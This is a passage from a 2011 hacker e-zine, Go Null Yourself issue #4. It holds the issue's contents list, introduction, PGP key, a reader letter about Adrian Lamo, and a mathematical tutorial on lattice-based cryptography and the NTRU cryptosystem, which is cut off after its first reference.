Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- __
- _,-;''';`'-,.
- ,yNNNNNNNNo ,mMMMMMMMMd, _/', `; `; `\
- -Mm oMd `NM: , _..,-'' ' ` ` `\
- :Mm mM oMN mM: | ;._.,,-' .| |,_ ,, `\
- .NMmmmmmmMM 'MMmmmmmNMN' -dh dd. | `;' ;' ;, `, ; | ' ' . \
- :Mm MM. *purr* `; __` ,'__ ` , ` ; | ; \
- dNNNNNNNNN, MM. yM :Mm MM. ; (6_); (6_) ; | , \ ' |
- NM: :My MM. yM :Mm MM. ;; _,' ,. ` `, ' `-._ |
- MM: :MN MM. yM :Mm MM. ,;.=..`_..=.,' -' ,'' _,--''
- MM: :MM mMNmmmmmMM :Mm MM. _pb__\,`"=,,,=="',___,,,-----'''----'_'_'_''-;''
- -----------------------'''''''''''''' hM) /'
- .h+ sh :hdddddddh/ dd` :ds oddddddddy. ,ddddddd-d ,yddddddddo ,/ ,/'ddddddd`
- -Mm+++++++oMM mMs:::::oMm MM. /Mh MM::::::hMh Mm+````` yMh`````yMM /' /Mh````````
- /sssyMMssso- mM/ oMM MM. /Mh MM :+/ 'hhhhhhdM, yMh hh__,,-' /' MMNNNNNNNN.
- .MM NMdyyyyydMN MMdyyyyymMh MM ,,,,,,,,MM sMN,/'_,,--''Mo My````````
- `o+ `+ooooooo+` .+oooooooo: oo .oooooooo+: `/o| (ooooo /o- My
- `' My
- +:
- 0x01 Introduction || 0x08 MapReduce, Part 2 elchupathingy
- 0x02 Feedback + Edits || 0x09 Cameras + DVRs Scan storm
- 0x03 Lattice-Based Cryptography rattle || 0x0a 303-833-00xx Scan Shadytel, Inc
- 0x04 duper's Code Corner duper || 0x0b bit.ly Shenanigans Silks, elchupa
- 0x05 The Tech Behind Credit Cards K141 || 0x0c Programming Challenge storm
- 0x06 Brief Notes on Kiosk Hacking storm || 0x0d The Scoop on LIGATT
- 0x07 Linux Rootkit Dev Update duper || 0x0e Et Cetera, Etc. teh crew
- [==================================================================================================]
- [================================================]
- Go Null Yourself E-Zine
- Issue #4 - Spring/April 2011
- www.GoNullYourself.org
- "It makes sense if you don't think about it"
- [================================================]
- [==================================================================================================]
- -=[ 0x01 Introduction
- Ahoy there, and welcome to issue #4 of GNY Zine - just in time for spring! The sun is shining, the
- birds are chirping, and with the advent of laptops, now all you little h4xx0rs have no excuse not to
- go outside! For those who still prefer the cool depths of a basement, though, then GNY Zine has all
- you need in lieu of vitamin D and a social life. Like crypto! And rootkits! And leet ASCII art!
- We may not have iced tea, but here's a recipe to make up for it:
- * 8 cups water
- * 3 orange pekoe tea bags
- * 3/4 cup SPLENDA® No Calorie Sweetener, Granulated
- * 1/2 cup lemon juice
- 1. In a large saucepan, heat water to a rapid boil. Remove from heat and drop in the tea bags.
- Cover and let steep for 1 hour.
- 2. In a large pitcher, combine the steeped tea and the SPLENDA® Granulated Sweetener. Stir until
- dissolved, then stir in lemon juice. Refrigerate until chilled.
- Hey, it got quite a few good reviews and only has 11 Calories.
- Anyways, don't want to keep you. Those 3100 lines below aren't gonna read themselves. Enjoy the
- zine, and see ya in the summer.
- Notable Events
- ==============
- January 2011 - Leak of LIGATT Security/Gregory D. Evans
- January 31, 2011 - Go Null Yourself turns 3-years-old
- February 3, 2011 - Exhaustion of remaining IPv4 address space
- February 2011 - Leak of HBGary, Inc.
- -=-=-
- Now, on to formalities...
- If you are interested in submitting content for future issues of GNY Zine, we would be happy to
- review it for publication. Content may take many forms, whether it be a paper, review, scan, or
- first-hand account of an event. Submissions of ASCII cover art that display the GNY logo in some
- way are also appreciated. Well-received topics include computer hacking and exploitation methods,
- programming, telephone phreaking (both analog and digital), system and network exploration, hardware
- hacking, reverse engineering, amateur radio, cryptography and steganography, and social engineering.
- We are also receptive to content relating to concrete subjects such as science and mathematics,
- along with more abstract subjects such as psychology and culture. Both technical and non-technical
- material is accepted.
- Submissions of content, suggestions for and criticisms of the zine, and death threats may be sent
- via:
- - IRC private message (storm, m0nkee, or Barney- @ irc.gonullyourself.org #gny)
- - Email (zine@gonullyourself.org)
- If there is enough feedback, we will publish some of the messages in future issues. Our PGP key is
- available for use below.
- We have devoted a lot of effort into this publication and hope that you learn something from reading
- it. Abiding by our beliefs, any information within this e-zine may be freely re-distributed,
- utilized, and referenced elsewhere, but we do ask that you keep the articles fully intact (unless
- citing certain passages) and give credit to the original authors when and where necessary.
- Go Null Yourself, its staff members, and the authors of GNY Zine are not responsible for any harm or
- damage that may result from the information presented within this publication. Although people will
- be people and act in idiotic fashions, we do not condone, promote, or participate in illegal
- behavior in any way.
- -----BEGIN PGP PUBLIC KEY BLOCK-----
- Version: GnuPG v1.4.11 (GNU/Linux)
- mQENBEzNnTIBCADCuSQtPeshJqqYd8KHfNoQ7ru3mWfwL3dc3MAgH1QYL1m1DSGs
- 3rAeWqyN2Jv1LVz2qLFXsqCdQhEW2wZg2tPPgoGiKAXbWE2itIoPSa/M1jrms6ai
- vwq2ySiWPi2F77Rlyuwqs2Acoj+AGm1JINejx7DcK8RLWDViw+f8DMHmDZI4SS+s
- fE7kVKh0/mLE7TGBXL7rCNA2bOPEHah0nQw2X18v3UNMV6R31FWVAZgSuL/RI+sV
- LOuKDANYuj36KxFlx2pDUwHDUcB+BMqxzmdosC98xu80fKuNVEsLz3HpUXTfdSLJ
- 6F4gyKs1n2q7f6JcsdfoZ4nmj0IATnTK9tvfABEBAAG0HnN0b3JtIDxoaXhtb3N0
- b3JtQGhvdG1haWwuY29tPokBPgQTAQIAKAUCTM2dhwIbIwUJCWYBgAYLCQgHAwIG
- FQgCCQoLBBYCAwECHgECF4AACgkQ6oWhb3tw/4DtYgf9Ga/2HD5gP84qTZkh7aOx
- PZQJJ3wJpZmQGw8kSvJLhtfBsvJJd8PuPay8aBmkVT+S+p0qUYjxc/BTD57t9O4+
- Yh8DRk4gK+L9gvqR/RE/GxMEO+cyMXl0Nl8bTkV/qCygoctbTLPPJF37ZEFF0dp1
- 1kWUSdTkJ7++gs7b0+YCX65oyyg8OpHVSmw9KUU90aHyfeu7MdgGrEGR+FNDn9uK
- m9WamrOp82UKmb8wytXfnbG7z2XvgRynxazl7I4ErExtr6pbyPJCryrIGmlG/qzT
- cabX6tHtRnVSgrB+BVWu+XpHRi1lns8QxXYvV4SBAZDEBDq6f1qMpHFxyzq7MNSP
- t7Qfc3Rvcm0gPHppbmVAZ29udWxseW91cnNlbGYub3JnPokBPgQTAQIAKAUCTM2d
- fAIbIwUJCWYBgAYLCQgHAwIGFQgCCQoLBBYCAwECHgECF4AACgkQ6oWhb3tw/4CW
- Dgf/dr7c6POPiMPrf30J39UrlvaS3BFo66WgEY3wa24brtv24Y19Ehk8fmP78uS/
- tkfdg+6Pu280ILechVjofDqjDHSyVSy+CSVp1TJpgYvPbIcEa4JQoscUEe4lGJGg
- 1akXKu4RX1/o5wQrC/Tokm0NySxSPZfPhOnR5Bu1C6zvhneLVKpgLflfsCvlokxN
- bo3TIAsfgqodkYR5CdyWGUYYQ9c4nbz0F6cSI2+k/mWFDljv4UQECl3MUcU2fNiC
- a+1FAT6wmohVylYyyaA6YPVoe/9g5mKWQZyUq++bduLvV1qotpk7uJpKe3tgMJTn
- /3tYZbhywejqTRRauGBSGv7QcrQgc3Rvcm0gPHN0b3JtQGdvbnVsbHlvdXJzZWxm
- Lm9yZz6JAUEEEwECACsCGyMFCQlmAYAGCwkIBwMCBhUIAgkKCwQWAgMBAh4BAheA
- BQJMzZ2KAhkBAAoJEOqFoW97cP+AS24IALcjJUygQnHg2kdIuGCErQP511aqxwFO
- CC5MEXRG+Mg7GLrtc6wy+D89ifWQldUR0UwK/S7MMQC2OhOJtdvjai7k8LfmeG1G
- iJZ6XYY7WEzaQWiVPso1P5SVo41OT38EXL6t2Ic3yGVGKJ9Vpo25SEmEoC9EL2Xa
- Blze0Z/6x5JUbK0yCY37vu2mYGLFpg7lCKQL24vg13OjNOMzeJFQssPCOeSCHkJv
- L+u5E9ohdUmHwWXAJVUieIu/S6sFDH0GrxNp8/YLhA4I/APpSjBZ6tofkrXNyajQ
- 9xjPT3KhuMErxRG+8a8iHhUH2VRibSdjwgJUxeg3DMqDQtxNFaRaFbqJAT4EEwEC
- ACgFAkzNnTICGyMFCQlmAYAGCwkIBwMCBhUIAgkKCwQWAgMBAh4BAheAAAoJEOqF
- oW97cP+AMmcH/jrXI3Y+WVkC3XgaRC+CnInMNJSLnMpoX2hkKfJsIMiiH19O41+O
- W0U7bE0gvRjlDpQYEKlSnNz4a+bGmmceAmy6Rr11QsOuhtZG3/AfkhFEQ4f3U3zt
- 3miZILzcFc6vVXhXoq9stC6hoCzDPBu34s0OusHwxuVxX1eqCBSJYyrqSTlbxUKv
- SYFfC/MzU6Q+iSZgiPNTYdgKIN3JKqZ2726i5IJOu6xIKNQByU4nEgV+Z4YjH7YD
- MT9c6uSgqTACVM5h+3GW78G4Wl1E0lOXvimM/AEXHQSkZi34yq+JbOFspbyBhBz7
- wRCIig4YSFDSwzPDdIx14NQlEq3+/tR9zx+5AQ0ETM2dMgEIALxlzgUfJ4leMnFF
- gURwNGM5x9aTquU548xI4ESCeaDMkj6nHhrV4NAliBq28i48UjgI7IdE3pKYfQXi
- aJZzQf4I+JULQkVzxF4uOjShhfXmhtABvBn+7du8qPqt5PwIFdb7ffmvXWFIX/in
- +4QlDnlrz7xMQJBrBE9S4BJzR5IgWxpb7xA1yUWEJ+5vME3R+JhJuozmmmuMBHR1
- s8pk8oEVrdmqdHeG5YZLsMyR5Kh6qJbPcj96CS9CtQU3HiEW0nwv8c3tNPY/4rNf
- CAkeOWLAOvAq0Ybd82cIQr7Q0wVFo132H0Xs3Gw4MTiyvcd/BrGHeyjoBJfMhLCF
- elFSEn0AEQEAAYkBJQQYAQIADwUCTM2dMgIbDAUJCWYBgAAKCRDqhaFve3D/gBq2
- CACpH3rPcPb4HswNplVUMift+b5dV2ETYuNFXMK8yblFXa9URA6vdUzqrF9XSc6+
- Tz9v/PVWY6FKKpnH06cbZQS07FWuY+zopsipuPgTaFLQyLlG2M+OoQOyEUYUpBW+
- wTJ2Jd4hPiTlaoCLg2niA0RyzxzbnelrTtDtFtMoqJJlLWdtFoITW8/OLASHA7vu
- bvRlfW89nueq9/4vEbxnvlUa7cOPtcZcGfHneHWV4JI9e5NJ6Agxp1gOkouF9/jn
- YneawjaEgI6QOS06yyTXOu/XCo6L+f4/wd+1EMzt+NjsUXSraeNw+tdjZEZ8Uo9/
- 8QJQ4gF00KrsCCSrPyg/cZ5G
- =g7oJ
- -----END PGP PUBLIC KEY BLOCK-----
- [==================================================================================================]
- -=[ 0x02 Feedback and Edits
- We always strive to publish accurate information in GNY Zine, but we the authors and editors are in
- fact human beings and are subject to making mistakes from time to time, despite our best efforts.
- The publication, compilation, and distribution of this e-zine is derived entirely from our passion
- for technology and curiosity of how things tick. GNY Zine has no commercial influences. If you
- find that there is an error in content that we have published, please do not hesitate to email us so
- that it may be announced and corrected in the next issue. Not acting like a stuck-up elitist about
- it will probably invoke a more positive response too.
- With that being said, we are also receptive to content or personal experiences relevant to
- information presented in past issues. If you've written some code, applied a concept in a new way,
- or just want to voice your opinion about a topic, send us an email!
- We may be contacted at: zine@gonullyourself.org
- (PGP key is available in the Introduction)
- Please note that emails we like will be published in future issues, so specify if you wish for your
- message to remain private or if you wish for us to redact certain personal information from it.
- ----------------------------------------------------------------------------------------------------
- Turning Manning into the Feds turns an institution with relatively
- unlimited power against Manning. The techniques used by Lamo were a
- betrayal of trust given (arguably without having been earned) to Lamo.
- Lamo is a snitch by definition. The fact that he still has hosting
- on domains like resist.ca, is further evidence that resist.ca can not
- be trusted as an anarchist resource.
- The panel at HOPE in which Lamo was confronted framed the hacker
- community as one that is filled with snitches. Members of the panel
- told stories about how they were turned in by people they collaborated
- with and trusted. Behavior like this closes doors to the flow of
- information, welcomes the violence of authoritarian institutions, and
- sets the foundation for the privatization of security research.
- Behavior like Lamo's is in opposition to the safety and values of the
- hacker community, and as a result should not be allowed space.
- Idolizing individuals who act with such a disregard for the hacker
- community they claim to be a part of with a glowing expose is a
- disgrace to the hacker community.
- With disgust,
- evoltech
- >> Thanks for sending us your opinion. Though, we checked and it seems like Adrian's website is
- >> currently 404'ing (for those of you who didn't read the interview from issue #2, the URL is
- >> http://users.resist.ca/~adrian/). We actually followed up on this and contacted resist.ca about
- >> it, who replied:
- Hi there,
- Sorry we haven't responded to you yet about your question about Adrian Lamo's website on resist.ca.
- We removed his various accounts becuase his motivations seem to be in conflict with ours (see
- http://www.youtube.com/watch?v=ebLahUUr__s). Our project is politically motivated and we offer
- services to projects that share our political alignment. Adrian's activities around the wikileaks
- debacle suggest to us that he doesn't actually align with us politically.
- For more information on the kinds of political activism we support, please read our mission
- statement at http://resist.ca/mission and our basis of unity at http://resist.ca/basis
- --The resist.ca collective
- >> So, there you go.
- [==================================================================================================]
- -=[ 0x03 Lattice-Based Cryptography
- -=[ Author: rattle
- -=[ Website: http://www.awarenetwork.org/
- p o s t - q u a n t u m
- ,----,----,--,--,-----.|¯¯|_.-----.-----.----.---.-.-----.|¯¯|--.--.--.
- | __| _| | | = || _| = | = | _| = | = || | | |
- |____|__| |___ | __||____|_____|___ |__| |___._| __||__|__|___ |
- |_____|__| |_____| |__| |_____|
- A Lattice-Based Crypto System
- rattle // born // tobi
- -- 0 Requirements --------------------------------------------------------------
- I will expect readers to have a basic grasp of (linear) algebra. The terms I
- will use without further explanation are the following:
- - vector
- - linear independence
- - matrix
- - rank of a matrix
- - transpose of a matrix
- - scalar products
- - quotient rings Z(q) = { 0, ..., q-1 }
- (where all operations are performed modulo q)
- I also expect the reader to have a certain idea of computational complexity, if
- even only the roughest. You should have heard of the following notions:
- - Big-O notation (Landau symbols)
- - Time/Space complexity of an algorithm
- I really can not give a complete introduction to these topics here. I would
- recommend literature, but all the undergraduate books on these topics that I
- know are in German.
- ---- 0.1 Notation --------------------------------------------------------------
- When A is some (n x m)-matrix (this means it has n rows and m columns), then
- the entry in the i-th row and j-th column is denoted by A[i,j]. Similarly,
- if a is a vector (which is just a (n x 1)-matrix), we will denote the i-th
- entry of this vector by a[i]. The transpose of a matrix A is denoted by A°.
- The canonical basis of real space will be denoted by e(1)...e(n), which are
- the vectors defined by e(i)[j]=1 <=> i=j and e(i)[j]=0 otherwise.
- We will denote the real numbers by R, the integer numbers by Z. The notation
- X^n is to be read as "X to the n" and denotes Cartesian powers if X is a set,
- otherwise it means multiplying X with itself n times, duh. In real space, if
- a and b are vectors, we denote by
- <a,b> = a[1]·b[1] + ··· + a[n]·b[n]
- the Euclidean scalar product.
- -- 1 Introduction --------------------------------------------------------------
- Given linearly independent vectors B[1],...,B[n] in R^n, the lattice spanned
- by these vectors is the set
- L = { a[1]·B[1] + ... + a[n]·B[n] | a in Z^n }
- of all integer linear combinations of them. The following is an example in R^2:
- Each lattice point is marked by an x and the 'grid' has been ASCII-modelled
- for your convenience.
- ^
- |· · ·. · · ·. · ·
- 7 x · x · x ·
- | ·. · · ·. · · ·. ·
- 6 | x · x · x
- | · ·. · · ·. · · ·
- 5 | · x · x ·
- | ·. · · ·. · · ·. ·
- 4 | x · x · x
- | · ·. · · ·. · · ·.
- 3 | · x · x ·
- | · · ·. · · ·. ·
- 2 | x · x · x
- | · ·. · · ·. · · ·. ·
- 1 | · x · x · x
- |· · ·. · · ·. · ·
- --+---------------------------x---------------------------x----------------->
- | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
- |
- Figure 1: Example of a two-dimensional Lattice
- Now, consider the following picture. We have added a "target" vector (marked €)
- and a circle around it intersecting the closest lattice point, which is p=(5,3)
- in this case.
- ^
- |· · ·. · · ·. · ·
- 7 x · x · x ·
- | ·. · · ·. · · ·. ·
- 6 | x · x · x
- | · ·. · · ·. · · ·
- 5 | · x · x ·
- | ·. · _·_ ·. · · ·. ·
- 4 | x Ž · ` x · x
- | · ·. | · € | · ·. · · ·.
- 3 | · p , · x ·
- | · · ¯ ¯ ·. · · ·. ·
- 2 | b · x · x
- | · ·. · · ·. · · ·. ·
- 1 | · a · x · c
- |· · ·. · · ·. · ·
- --+---------------------------d---------------------------x----------------->
- | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
- |
- Figure 2: Lattice with target vector
- Using the basis a=(4,1) and b=(1,2), it is easy to see that p = a + b. On the
- other hand, using the basis c=(18,1) and d=(7,0), the same point has the less
- simple description p = 3·c - 7·d. When passing to higher dimensions, this
- phenomenon escalates drastically. This way, we obtain a computational problem
- that varies from easy to virtually impossible to solve, depending very much on
- on the lattice basis used.
- ---- 1.1 Lattice Problems ------------------------------------------------------
- Let L be a lattice and g some real value greater or equal to one. We denote by
- d(x,y) the distance from the point x to the point y. The lattice approximation
- problems are the following:
- CLOSEST VECTOR PROBLEM -- CVP(g):
- For any vector t in R^n, let y be the lattice point closest to t. The task is
- to find a lattice point x not equal to t such that d(x,t) is less or equal to
- g·d(y,t). In other words, x is no further from t than g times the distance
- from t to any lattice point.
- SHORTEST VECTOR PROBLEM -- SVP(g):
- Find a vector x such that x is no longer than g times the shortest lattice
- vector. This is the special case of the CVP where t=(0,...,0) is the origin.
- We also write SVP = SVP(1) and CVP = CVP(1) for the non-approximative problems.
- ---- 1.2 Lattice-based Encryption: Breakdown -----------------------------------
- Based on these problems, we can build an assymetrical cryptosystem, which is
- roughly described as follows:
- a) Choose a random "good" basis and keep it as a private key.
- b) Hand out a "bad" basis for the same lattice as a public key.
- c) Somehow find a way to encode your messages as lattice points.
- d) Encrypt a lattice point by simply distorting it randomly by a small vector.
- e) Decryption now means that you have to find the lattice point closest to the
- distorted vector (because it was the original message). This is now
- equivalent to solving the CVP, which should only be possible when in
- possession of a "good" basis.
- ---- 1.3 Analysis of SVP -------------------------------------------------------
- We now give a brief historical analysis of the hardness of the SVP(g) - one
- should note here that the CVP(g) is harder than the SVP(g), therefore it would
- suffice if the SVP(g) was hard to solve. And indeed, from the algorithms known
- so far, it seems that we can either achieve a polynomial runtime or a
- polynomial approximation factor, but not both:
- +--------+--------------+--------+-------------------------------------+
- | g | Runtime | Space | Reference |
- +--------+--------------+--------+-------------------------------------+
- | 1 | 2^O(n) | 2^O(n) | [JHLW11, Combinatorial SVP-Solver] |
- | 1 | 2^O(n log n) | poly | [Kan83] |
- | poly | 2^O(n) | 2^O(n) | [MR09] |
- | 2^O(n) | poly | ? | [LLL82] |
- +--------+--------------+--------+-------------------------------------+
- This has led to the following conjecture:
- Conjecture 1.1. There is no polynomial time algorithm that approximates
- lattice problems to within polynomial factors.
- As far as exponential-time exact solvers are concerned, they have become
- practical even for small instances just in the recent years:
- +------+-------------------------+----------+-----------+
- | Year | Authors | Time | Space |
- +------+-------------------------+----------+-----------+
- | 2001 | Ajtai, Kumar, Sivakumar | 2^O(n) | 2^O(n) |
- | 2004 | Regev | 2^(16n) | 2^(8n) |
- | 2008 | Nguyen, Vidick | 2^(5.9n) | 2^(3n) |
- | 2010 | Pujol, Stelhé | 2^(2.5n) | 2^(1.2n) |
- +------+-------------------------+----------+-----------+
- One should note, however, that lattice reduction methods such as [LLL82] seem to
- perform better in practice than their theoretic worst-case guarantees suggest.
- This is not fully explained yet, but has experimental evidence: In [GN08],
- different algorithms and several distributions on lattices were compared with
- the result that they provide an approximation ratio of roughly g=d^n where d is
- close to 1.012. Still, it seems that approximation rations of (1.01)^n are
- outside the reach of known lattice reduction algorithms. We should note that
- for __________
- / n
- g > / --------
- ¯\/ log(n)
- the SVP(g) is not NP-hard unless the polynomial time hierarchy collapses (you
- should read this as "is not NP-hard"). However, it was shown in [Ajt98] that the
- SVP=SVP(1) actually is NP-hard. Furthermore, there are no quantum algorithms
- known that perform better than the classical ones. Because of this, lattice-
- based cryptography is often labelled "post-quantum" cryptography. In summary, we
- may very well assume that the SVP is a hard problem.
- -- 2 NTRU ----------------------------------------------------------------------
- We will now present a practical implementation of the rough idea presented in
- subsection 1.2. For the mathematically inclined, a detailed explanation of why
- the encryption scheme really works the way we outlined in 1.2 can be found in
- [JHLW11].
- ---- 2.1 Mathematical Necessities ----------------------------------------------
- We first require a couple of mathematical definitions and results, since NTRU
- operates on a very special kind of lattices.
- Definition 2.1. Let Z(q) = {0,...,q-1} be the integer numbers from 0 to q-1,
- with all operations performed modulo q. We denote by p: Z --> Z(q) the map that
- sends any number n to (n mod q). When A is a matrix with integer entries, we
- denote by p(A) the matrix with entries in Z(q) which is obtained by reducing all
- entries modulo q.
- Definition 2.2. Let v in R^n be a vector an A an (n x n)-matrix. We then define
- the matrix
- / \
- | v[0] (A·v)[0] ··· (A^(n-1)·v)[0] |
- | · · · |
- (A*v) := | · · · |
- | · · · |
- | v[n] (A·v)[n] ··· (A^(n-1)·v)[n] |
- \ /
- whose i-th column is the result of applying A exactly (i-1) times to v. We also
- define the special (n x n)-matrix
- / | \
- | 0 · · · 0 | 1 |
- | ---------------+--- |
- | 1 0 · · 0 | 0 |
- T := | 0 · · | · |
- | · · · | · |
- | · · 0 | · |
- | 0 · · 0 1 | 0 |
- \ | /
- and will make frequent use of the matrix (T*v), which is the matrix whose i-th
- column is just v, rotated by i.
- Lemma 2.3. For any two vectors f and g,
- 1) (T*f)·g = (T*g)·f
- 2) T·(T*f) = (T*f)·T
- 3) (T*f)·(T*g) = (T*((T*f)·g))
- Proof. Consider the (k x k)-matrices
- / \
- | 0 · · 0 1 |
- | · · 0 |
- I(k) := | · · · |
- | 0 · · |
- | 1 0 · · 0 |
- \ /
- and the symmetrical (n x n)-matrices
- / | \
- | I(k) | 0 |
- S(k) := | ------+-------- |
- | 0 | I(n-k) |
- \ | /
- Then, we have
- / \ / \ / \
- | g[1] g[n] ·· g[2] | | <f,S(1)·g> | | <S(1)·f,g> |
- | g[2] g[1] ·· g[3] | | <f,S(2)·g> | | <S(2)·f,g> |
- (T*g)·f = | · · · | · f = | · | = | · | =: h
- | · · · | | · | | · |
- | g[n] g[n-1] ·· g[1] | | <f,S(n)·g> | | <S(n)·f,g> |
- \ / \ / \ /
- And clearly, (T*f)·g = h. This proves part (1) already. For the second state-
- ment, we calculate (all index operations are performed modulo n):
- __ n
- <S(i-1)·f,(T^j)·g> = > (S(i-1)·f)[k] · ((T^j)·g)[k]
- ¯¯ k=1
- __ i-1 __ n
- = > f[i-k]·g[k-j] + > f[n+i-k]·g[k-j]
- ¯¯ k=1 ¯¯ k=i
- __ i __ n+1
- = > f[i-k+1]·g[k-j-1] + > f[n+i-k+1]·g[k-j-1]
- ¯¯ k=2 ¯¯ k=i+1
- __ i __ n
- = > f[i-k+1]·g[k-j-1] + > f[n+i-k+1]·g[k-j-1]
- ¯¯ k=1 ¯¯ k=i+1
- = <S(i)·f,T^(j+1)·g>
- which yields
- / \ / \ / \
- | <S(1)·f,T^(j-1)·g> | | <S(n)·f,T^(j-1)·g> | | <S(1)·f,(T^j)·g> |
- | <S(2)·f,T^(j-1)·g> | | <S(1)·f,T^(j-1)·g> | | <S(2)·f,(T^j)·g> |
- T · | · | = | · | = | · |
- | · | | · | | · |
- | <S(n)·f,T^(j-1)·g> | | <S(n-1)·f,T^(j-1)·g> | | <S(n)·f,(T^j)·g> |
- \ / \ / \ /
- and therefore,
- / \
- | <S(1)·f,T^(j-1)·g> |
- T^(j-1) · h = (T*h)_j = | ... |.
- | <S(n)·f,T^(j-1)·g> |
- \ /
- With this, it is now obvious that
- / \ / \
- | f[1] f[n] · · f[2] | | g[1] g[n] · · g[2] |
- | f[2] f[1] · · f[3] | | g[2] g[1] · · g[3] |
- (T*f)·(T*g) = | · · · | · | · · · | = (T*h).
- | · · · | | · · · |
- | f[n] f[n-1] · · f[1] | | g[n] g[n-1] · · g[1] |
- \ / \ / q.e.d.
- Definition 2.4. Let n and d be positive integer numbers and d < n. A vector f in
- Z^n is called a d-vector if it has exactly d negative and d+1 positive entries.
- ---- 2.2 The NTRU Cryptosystem -------------------------------------------------
- We can now describe the process of key generation for the NTRU cryptosystem:
- ________________________________________________________________________________
- Algorithm 1: NTRU-KEY-GENERATION
- ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
- Input: A prime number n, a "modulus" q, a "weight bound" d and an integer p<q.
- Output: A private key (f,g) in Z^(2n) and a public key h in Z(q)^n.
- ________________________________________________________________________________
- 1: CHOOSE two d-vectors f' and g in {p,0,-p}^n randomly
- 2: SET f := f' + e(1)
- 3: IF p(T*f) is not invertible THEN
- 4: GOTO 1
- 5: SET h := (T*f)^(-1) · g
- 6: SET h := h mod q
- 7: RETURN (f,g) and h
- ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
- The number q is called the modulus because we operate modulo q, the reason why
- we call d the "weight bound" will become apparent later. From the choice of the
- vectors f and g in the algorithm, we immediately obtain the following result:
- Proposition 2.4. Let (f,g) and h be a key pair generated by Algorithm 1. Then,
- (T*f) mod p = I and (T*g) mod p = 0.
- Let us now take a look at the encryption and decryption routines:
- ________________________________________________________________________________
- Algorithm 2: NTRU-ENCRYPTION
- ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
- Input: A prime number n, a modulus q, a weight bound d, a public key h, and a
- d-vector m in {1,0,-1}^n encoding the message.
- Output: A ciphertext c in Z(q)^n.
- ________________________________________________________________________________
- 1: CHOOSE a d-vector r in {1,0,-1}^n randomly
- 2: RETURN m + (T*h)·r
- ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
- This encryption routine works exactly as step d) in 1.2: We choose a random
- "distortion" vector r and distort the message by (T*h)·r. The result is our
- ciphertext.
- ________________________________________________________________________________
- Algorithm 3: NTRU-DECRYPTION
- ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
- Input: A prime number n, a modulus q, a weight bound d, an integer p < q,
- a private key (f,g) in Z(q)^n and a ciphertext c in Z(q)^n.
- Output: The plaintext message m in {1,0,-1}^n
- ________________________________________________________________________________
- 1: SET v := (T*f)·c
- 2: FOR i=1 TO n DO
- 3: CHOOSE t such that p(t)=w[i] and |t| is minimal
- 4: SET v[i] := t mod p
- 5: RETURN v
- ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
- It is not yet clear why the decryption routine actually recovers the plaintext
- from a given ciphertext - and in fact, it doesn't do so in every case:
- Proposition 2.5. With a parameter choice satisfying
- 8dp + 4p + 2 < q, (#)
- the NTRU-Cryptosystem works correctly.
- Proof. Assume that c is a ciphertext generated by the NTRU-ENCRYPTION. Then,
- by Lemma 2.3,
- (T*f)·c = (T*f)·m + (T*f)·(T*h)·r = (T*f)·m + (T*((T*f)·h))·r
- modulo q. Since h = (T*f)^(-1)·g, this gives us
- (T*f)·c mod q = (T*f)·m + (T*g)·r mod q.
- If the absolute values of all entries of the vector v := (T*f)·m + (T*g)·r are
- bounded by q/2, the loop in steps 2 to 4 of the NTRU-DECRYPTION algorithm will
- recover the value of v in Z^n and NOT just modulo q. By 2.4, this would then
- mean
- v mod p = (T*f)·m + (T*g)·r mod p = I·m = m.
- Hence, let us inspect the vector v more closely. Its i-th entry is given by the
- formula
- __ n
- v[i] = > ( (T*f)[i,j]·m[j] + (T*g)[i,j]·r[j] )
- ¯¯ j=1
- __ n
- = > ( (T^(j-1)·f)[i]·m[j] + (T^(j-1)·g)[i]·r[j] )
- ¯¯ j=1
- __ n
- = > ( f[i-j+1]·m[j] + g[i-j+1]·r[j] )
- ¯¯ j=1
- We write f' := f - e(1), which is the vector chosen in step 1 of the
- NTRU-KEY-GENERATION algorithm. Estimating the absolute value of v[i], it is
- maximized for
- f'[i-j+1] = -p if m[j] = -1 and g[i-j+1] = -p if r[j] = -1
- p if m[j] = 1 p if r[j] = 1
- Since f=f'+e(1), we get
- |v[i]| <= (2d+1)·p + (2d+1)·p + 1 = 4dp + 2p + 1,
- yielding (#), if we want the absolute values of v to be bounded by q/2; q.e.d.
- -- 3 Further Reading -----------------------------------------------------------
- If you would like to read the fullblown math article, it is reference [JHLW11]
- and the URL to the PDF is given below.
- ---- 3.1 References ------------------------------------------------------------
- [LLL82] A.K. Lenstra, H.W. Lenstra, and L. Lovasz, Factoring polynomials with
- rational coefficients, Math. Ann. 261 (1982), 515-534.
